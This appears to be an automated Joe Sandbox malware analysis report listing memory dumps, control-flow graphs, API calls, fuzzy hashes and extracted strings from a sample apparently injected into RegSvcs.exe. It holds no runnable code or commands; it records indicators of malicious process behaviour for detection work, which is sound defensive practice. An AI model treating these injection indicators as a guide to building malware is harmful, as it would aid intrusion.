                                                                                                              • Associated: 00000000.00000002.1813982353.0000000007710000.00000004.08000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7710000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b92f2d374854252bb1f766a996e6aa80c23244a314a75d4fa5bdfe5713e32b1
                                                                                                              • Instruction ID: 2325d5e39373673ca85e0e4228e8a6c0ce947c4676948a2ad1db3062e4ff4ad9
                                                                                                              • Opcode Fuzzy Hash: 3b92f2d374854252bb1f766a996e6aa80c23244a314a75d4fa5bdfe5713e32b1
                                                                                                              • Instruction Fuzzy Hash: B5E1FCB4E002199FDB14DF99C5809AEFBB2FF89305F24C26AD415AB356DB30A941CF61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 22b12ca0dbfab0a62e8340581f1889ca351d89e1ec70acf7ad4a29a26e3b04c7
                                                                                                              • Instruction ID: 636b740e86f5bb8e1cb8ba732dc7dfa9b5231a98590c7761985b9dcb85ce6731
                                                                                                              • Opcode Fuzzy Hash: 22b12ca0dbfab0a62e8340581f1889ca351d89e1ec70acf7ad4a29a26e3b04c7
                                                                                                              • Instruction Fuzzy Hash: A4A19132E0021ACFCF15DFB8D84099EBBB6FFC5304B55456AE901AB265DB71E905CB81

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.1%
                                                                                                              Dynamic/Decrypted Code Coverage:5%
                                                                                                              Signature Coverage:9.3%
                                                                                                              Total number of Nodes:140
                                                                                                              Total number of Limit Nodes:11

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DC5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID: |xle
                                                                                                              • API String ID: 2234796835-379029741
                                                                                                              • Opcode ID: e4fe23eff29353edba087925b584054d096c447138b5cb241e71bf32c61b0e01
                                                                                                              • Instruction ID: 08bd548759aae07358cb4646aed3384bf96d8624cb653567a7904251cc283145
                                                                                                              • Opcode Fuzzy Hash: e4fe23eff29353edba087925b584054d096c447138b5cb241e71bf32c61b0e01
                                                                                                              • Instruction Fuzzy Hash: B1015EB1E4020DABDF10DAE1DC42FEEB378AF54308F0041AAE90897240F635EB498B95

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCE7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 3bf9c33cf7409904d2fd51a1091b6da9a301a50e1818314538d4cbce849de183
                                                                                                              • Instruction ID: 2e732b0acf22db8564dcba67f832cc3ad7cc9e83e5d8d7d52730fa31added9c1
                                                                                                              • Opcode Fuzzy Hash: 3bf9c33cf7409904d2fd51a1091b6da9a301a50e1818314538d4cbce849de183
                                                                                                              • Instruction Fuzzy Hash: BFE04F726446147BD120AA6ADC01F9B776CDBC6715F00451AFE486B241C775790087E4
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 6c9103fabb4391724a00c641fa909b1130fd69d6f926c90f84624d33a38f5f73
                                                                                                              • Instruction ID: 7c122859cda5735cfa88d52c7e3190221f5b65acb0d2046d145294b44a1b9722
                                                                                                              • Opcode Fuzzy Hash: 6c9103fabb4391724a00c641fa909b1130fd69d6f926c90f84624d33a38f5f73
                                                                                                              • Instruction Fuzzy Hash: DF90026160240003410972584418616408AA7E0211B59C421E1014990DC56589916225
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 220d5999afe8c2ff18fcbec11b728cf811283856e94346799e0008f8f8c898f4
                                                                                                              • Instruction ID: 77ac7b294673f5818fa2640514454856cf971841be5eca3eeeee6d53ff32a42e
                                                                                                              • Opcode Fuzzy Hash: 220d5999afe8c2ff18fcbec11b728cf811283856e94346799e0008f8f8c898f4
                                                                                                              • Instruction Fuzzy Hash: 2990023160140413D115725845087070089A7D0251F99C812A0424958DD6968A52A221
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 64284f91fc8fdcf540f350768119264298cedf07dd77707d9663ceb2cea0c902
                                                                                                              • Instruction ID: 3e29ed3d29b0892d6e8d646bbcd5991538b16a9bd0b63507ac230cab250efbfd
                                                                                                              • Opcode Fuzzy Hash: 64284f91fc8fdcf540f350768119264298cedf07dd77707d9663ceb2cea0c902
                                                                                                              • Instruction Fuzzy Hash: B190023160148802D1147258840874A0085A7D0311F5DC811A4424A58DC6D589917221
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 00c02998ad449e1fb0cdfaf22ac89aabc67d5067995c22b333551498058e2c6e
                                                                                                              • Instruction ID: 4adf2cd3ea3bdca79dca36a60b1f974098add921ac85357bd232ca71505b5a38
                                                                                                              • Opcode Fuzzy Hash: 00c02998ad449e1fb0cdfaf22ac89aabc67d5067995c22b333551498058e2c6e
                                                                                                              • Instruction Fuzzy Hash: 5D900231A0550402D104725845187061085A7D0211F69C811A0424968DC7D58A5166A2

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(06-AG764,00000111,00000000,00000000), ref: 004145FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 06-AG764$06-AG764$}B6B
                                                                                                              • API String ID: 1836367815-2301950950
                                                                                                              • Opcode ID: 32d0a85581feaec610a6c651d6e678cc6ff1858a0ad993c0795a2db33d822706
                                                                                                              • Instruction ID: e05182db85c9781ac3c469ae5be033ea5d1da759210e27bc0ae874b73e6a8d1c
                                                                                                              • Opcode Fuzzy Hash: 32d0a85581feaec610a6c651d6e678cc6ff1858a0ad993c0795a2db33d822706
                                                                                                              • Instruction Fuzzy Hash: D411E5B2D0111C7ADB11ABE59C81DEF7B7CAF4179CF048069FA04A7240D67C4E068BB5

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 06-AG764$06-AG764
                                                                                                              • API String ID: 0-1005340343
                                                                                                              • Opcode ID: 73aed8bb8df44d63caf875d85eefeeb182e15a5cee0129e437c242bd6b8eea98
                                                                                                              • Instruction ID: e435679f6665afacf91cf5e43732acf3c7632fa13cea7890ee95d90669a83247
                                                                                                              • Opcode Fuzzy Hash: 73aed8bb8df44d63caf875d85eefeeb182e15a5cee0129e437c242bd6b8eea98
                                                                                                              • Instruction Fuzzy Hash: 5621547394005D3ACB119A58AD819FFB7ADEF81334B0C8156EC48D7701D6388D4787D5

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(06-AG764,00000111,00000000,00000000), ref: 004145FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 06-AG764$06-AG764
                                                                                                              • API String ID: 1836367815-1005340343
                                                                                                              • Opcode ID: ce0f8da3631f06945a98a42f26bab445008cbfdc3b01d210e9895f74cc71e732
                                                                                                              • Instruction ID: 8e1aee84789d8e109a054ff5d87f6a3355407e3176ad634eaf2bf3cb58436bf1
                                                                                                              • Opcode Fuzzy Hash: ce0f8da3631f06945a98a42f26bab445008cbfdc3b01d210e9895f74cc71e732
                                                                                                              • Instruction Fuzzy Hash: 090104B2D0021C7ADB00AAE19C81DEFBB7C9F4079CF008069FA04A7240D67C4E0687B5

                                                                                                              Control-flow Graph (basic blocks listed as address ranges, edges as block->block; calls and API references noted inline)
                                                                                                              • 43: 417df7-417e12 -> 45
                                                                                                              • 45: 417e13-417e17 -> 46, 47
                                                                                                              • 46: 417e19-417e1f -> 50
                                                                                                              • 47: 417d9f-417db1 -> 48, 49
                                                                                                              • 48: 417db3-417dbd -> 51
                                                                                                              • 49: 417dca-417dcd
                                                                                                              • 50: 417e22 -> 52
                                                                                                              • 51: 417dc0-417dc7, LdrLoadDll -> 49
                                                                                                              • 52: 417e23-417e25 -> 53, 54
                                                                                                              • 53: 417e27-417e2a -> 45, 56
                                                                                                              • 54: 417dd6-417de0 -> 51, 55
                                                                                                              • 55: 417de3-417deb -> 57, 58
                                                                                                              • 56: 417e2b-417e38 -> 50, 59
                                                                                                              • 57: 417d7a-417d7c -> 60, 61
                                                                                                              • 58: 417ded-417df4
                                                                                                              • 59: 417e3a -> 62, 63
                                                                                                              • 60: 417d82-417d90, call 42ff33 -> 67, 68
                                                                                                              • 61: 417d7e-417d81
                                                                                                              • 62: 417e6c-417e6f -> 52, 64
                                                                                                              • 63: 417e3c -> 62
                                                                                                              • 64: 417e71-417e76
                                                                                                              • 67: 417da0-417db1, call 42e3f3 -> 48, 49
                                                                                                              • 68: 417d92-417d9d, call 4301d3 -> 67
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DC5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID: |xle
                                                                                                              • API String ID: 2234796835-379029741
                                                                                                              • Opcode ID: 910679a9904b8069b1d51d486db6c279e02f9d7234766a7e3e118b20bf22d700
                                                                                                              • Instruction ID: 74706c121a0511041eb66161e31037ffdd23514e4eda48774a9572b29bd1f95c
                                                                                                              • Opcode Fuzzy Hash: 910679a9904b8069b1d51d486db6c279e02f9d7234766a7e3e118b20bf22d700
                                                                                                              • Instruction Fuzzy Hash: E621547650870A9BDB14CA24E882BEAFBF2EF85354B10859ED405CB100E239EE86C765

                                                                                                              Control-flow Graph (basic blocks listed as address ranges, edges as block->block; calls and API references noted inline)
                                                                                                              • 90: 417dd3-417de0 -> 92, 93
                                                                                                              • 92: 417dc0-417dc7, LdrLoadDll -> 96
                                                                                                              • 93: 417de3-417deb -> 94, 95
                                                                                                              • 94: 417d7a-417d7c -> 97, 98
                                                                                                              • 95: 417ded-417df4
                                                                                                              • 96: 417dca-417dcd
                                                                                                              • 97: 417d82-417d90, call 42ff33 -> 101, 102
                                                                                                              • 98: 417d7e-417d81
                                                                                                              • 101: 417da0-417db1, call 42e3f3 -> 96, 107
                                                                                                              • 102: 417d92-417d9d, call 4301d3 -> 101
                                                                                                              • 107: 417db3-417dbd -> 92
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DC5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID: |xle
                                                                                                              • API String ID: 2234796835-379029741
                                                                                                              • Opcode ID: d25f39db3afd783deaab873e3bcf30208ff7f0e248ea19beb78da20a5af16b63
                                                                                                              • Instruction ID: ec85eaa0c4f7441129db57d33a1dfb13c9fdddb1091b3c73e9587e81164588ff
                                                                                                              • Opcode Fuzzy Hash: d25f39db3afd783deaab873e3bcf30208ff7f0e248ea19beb78da20a5af16b63
                                                                                                              • Instruction Fuzzy Hash: 33E0263154C60C7AD620B648BC47FBBBB2CEB81345F00429AFC0C81240E5246D90A1F6

                                                                                                              Control-flow Graph (single basic block; calls and API references noted inline)
                                                                                                              • 286: 42d023-42d067, call 404983, call 42def3, RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,A7E85651,00000007,00000000,00000004,00000000,004175CD,000000F4), ref: 0042D062
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: f6d78897837eaf5728a722e9d9bcfedcecfa8106b870659041dfb3a614048c7d
                                                                                                              • Instruction ID: 3c3b746281d21e7e3f49c7771b4cccdf7fc6bbd7da1f82bc83099fbb5e6804ba
                                                                                                              • Opcode Fuzzy Hash: f6d78897837eaf5728a722e9d9bcfedcecfa8106b870659041dfb3a614048c7d
                                                                                                              • Instruction Fuzzy Hash: 34E0EDB1604254BBD614EE59DC41F9B77ACEFC5714F004419FE08A7241D675B911CBB8

                                                                                                              Control-flow Graph (single basic block; calls and API references noted inline)
                                                                                                              • 281: 42cfd3-42d014, call 404983, call 42def3, RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041EB0E,?,?,00000000,?,0041EB0E,?,?,?), ref: 0042D00F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: 7e3178983a9da5f247ca9c5e6e561463a882993b86938145b26ca526565d38ef
                                                                                                              • Instruction ID: 8d89856d15ca0cfe871f97118b518311c6fd52371086a2a90eb6c8310eebbaee
                                                                                                              • Opcode Fuzzy Hash: 7e3178983a9da5f247ca9c5e6e561463a882993b86938145b26ca526565d38ef
                                                                                                              • Instruction Fuzzy Hash: 1CE06DB22002447FC614EE59EC41EDB77ACEFC9710F00441AFE08A7242C674B9108AB4

                                                                                                              Control-flow Graph (single basic block; calls and API references noted inline)
                                                                                                              • 296: 42d073-42d0af, call 404983, call 42def3, ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,3583ABD1,?,?,3583ABD1), ref: 0042D0AA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              • Opcode ID: 444dcd0509e69f77e1d34aa41e76693d4b37de84aa4f6651f4c6fe4085af390b
                                                                                                              • Instruction ID: d051ef962d83d02b4f9c33ceb59ed46ba6a16d81ade362a331e91d32086bf411
                                                                                                              • Opcode Fuzzy Hash: 444dcd0509e69f77e1d34aa41e76693d4b37de84aa4f6651f4c6fe4085af390b
                                                                                                              • Instruction Fuzzy Hash: C8E086712006547FC120EA5ADC41FDB775CDFC5714F01441AFE0867141C6B5B90087F5

                                                                                                              Control-flow Graph (basic blocks listed as address ranges, edges as block->block; API references noted inline)
                                                                                                              • 301: 15d2c0a-15d2c0f -> 302, 303
                                                                                                              • 302: 15d2c1f-15d2c26, LdrInitializeThunk
                                                                                                              • 303: 15d2c11-15d2c18
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1949cef9742fc98c6a8476f2eb4c5e89e3a55229c98486c4f0ad34eba3bdb5e8
                                                                                                              • Instruction ID: dd5498e994d33f10a70b297bf6bc3704806a627ca2b025b84a5387940168edff
                                                                                                              • Opcode Fuzzy Hash: 1949cef9742fc98c6a8476f2eb4c5e89e3a55229c98486c4f0ad34eba3bdb5e8
                                                                                                              • Instruction Fuzzy Hash: 0EB09B71D025C5D5DA16E764460C71B794077D0711F19C461D2030A42F4778C5D1E375
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2160512332
                                                                                                              • Opcode ID: 753cf0473531ffbebf807b5f258825d112e43e3b1894a6fa2dab422dd1fe2bca
                                                                                                              • Instruction ID: 06b2a617b03c5080b7b7583baf575935f9110f62788112b56b5754a1c5cf9f25
                                                                                                              • Opcode Fuzzy Hash: 753cf0473531ffbebf807b5f258825d112e43e3b1894a6fa2dab422dd1fe2bca
                                                                                                              • Instruction Fuzzy Hash: 10929A71604342AFE721CE28CC90B6BB7E9BB84714F28492DFA95DB354D770E844CB92
                                                                                                              Strings
                                                                                                              • 8, xrefs: 016052E3
                                                                                                              • Critical section debug info address, xrefs: 0160541F, 0160552E
                                                                                                              • Address of the debug info found in the active list., xrefs: 016054AE, 016054FA
                                                                                                              • Invalid debug info address of this critical section, xrefs: 016054B6
                                                                                                              • undeleted critical section in freed memory, xrefs: 0160542B
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01605543
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0160540A, 01605496, 01605519
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016054E2
                                                                                                              • Critical section address, xrefs: 01605425, 016054BC, 01605534
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016054CE
                                                                                                              • double initialized or corrupted critical section, xrefs: 01605508
                                                                                                              • Thread identifier, xrefs: 0160553A
                                                                                                              • corrupted critical section, xrefs: 016054C2
                                                                                                              • Critical section address., xrefs: 01605502
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                              • API String ID: 0-2368682639
                                                                                                              • Opcode ID: 3b70742a387fda5c4bbd6a03b38d6d0336959543e73da586f49a154c12b9a070
                                                                                                              • Instruction ID: 75fe547f71fddd1670b9ba8b3e9d4e6b13011bda2b096ad9f998424988c7758b
                                                                                                              • Opcode Fuzzy Hash: 3b70742a387fda5c4bbd6a03b38d6d0336959543e73da586f49a154c12b9a070
                                                                                                              • Instruction Fuzzy Hash: 02817AB1A41349AFEB25CF99CC45BAEBBB5FB48B14F104119E505BB280D3B1A941CBA0
                                                                                                              Strings
                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016022E4
                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01602506
                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01602624
                                                                                                              • @, xrefs: 0160259B
                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01602409
                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0160261F
                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01602412
                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01602498
                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016024C0
                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016025EB
                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01602602
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                              • API String ID: 0-4009184096
                                                                                                              • Opcode ID: 1b653e6362ea8df0b8668b534cf8f50968fe2b4b0fe7d3294d6cc8fb0e9b2b4a
                                                                                                              • Instruction ID: 3176527dc945a18ccef7d677beeacc02393115b914cb7bf5f62102f57b02aab3
                                                                                                              • Opcode Fuzzy Hash: 1b653e6362ea8df0b8668b534cf8f50968fe2b4b0fe7d3294d6cc8fb0e9b2b4a
                                                                                                              • Instruction Fuzzy Hash: DB025EB1D002299FDB25DF54CC94BDAB7B8BF54704F0441EEA609AB281EB709E84CF59
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                              • API String ID: 0-2515994595
                                                                                                              • Opcode ID: 051d0a5bfa22310cde095405b79f5a7b1fd9be0fe005d23fdda80f0b0717538c
                                                                                                              • Instruction ID: c4d36d7c45579d865188b1984fcbfec690d3b9ce9e715fc415b40681771995d4
                                                                                                              • Opcode Fuzzy Hash: 051d0a5bfa22310cde095405b79f5a7b1fd9be0fe005d23fdda80f0b0717538c
                                                                                                              • Instruction Fuzzy Hash: D3519B725143029BD329CF288C48BABBBECFFD8654F144A1DB99987241E770DA05CBD2
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              • API String ID: 0-1700792311
                                                                                                              • Opcode ID: 2858f580c102991b266aff57c73279242d6be801eb10ec390c75c9ba6ca1f4eb
                                                                                                              • Instruction ID: 51857c86373650716a5f2e9ce594073e2f0d8e756a59441848fc7a6e06378613
                                                                                                              • Opcode Fuzzy Hash: 2858f580c102991b266aff57c73279242d6be801eb10ec390c75c9ba6ca1f4eb
                                                                                                              • Instruction Fuzzy Hash: FED1CE316006A6EFDB26EF68C840AEDBBF6FF49610F088149F646AB752C734D941CB54
                                                                                                              Strings
                                                                                                              • VerifierFlags, xrefs: 01618C50
                                                                                                              • VerifierDlls, xrefs: 01618CBD
                                                                                                              • HandleTraces, xrefs: 01618C8F
                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01618A67
                                                                                                              • VerifierDebug, xrefs: 01618CA5
                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 01618B8F
                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01618A3D
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                              • API String ID: 0-3223716464
                                                                                                              • Opcode ID: 93dcb463bfad54ac9a9202e3e325b02f89dabf770aaf36d6f8b7f7514b46904f
                                                                                                              • Instruction ID: e9dccd21a847dc7a377d57cd14286cbec616c7189ea0cb285213ae8d03255a22
